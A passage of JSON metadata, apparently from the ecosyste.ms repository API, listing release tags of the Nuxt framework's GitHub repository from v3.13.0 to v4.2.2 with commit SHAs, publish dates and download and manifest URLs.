g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://git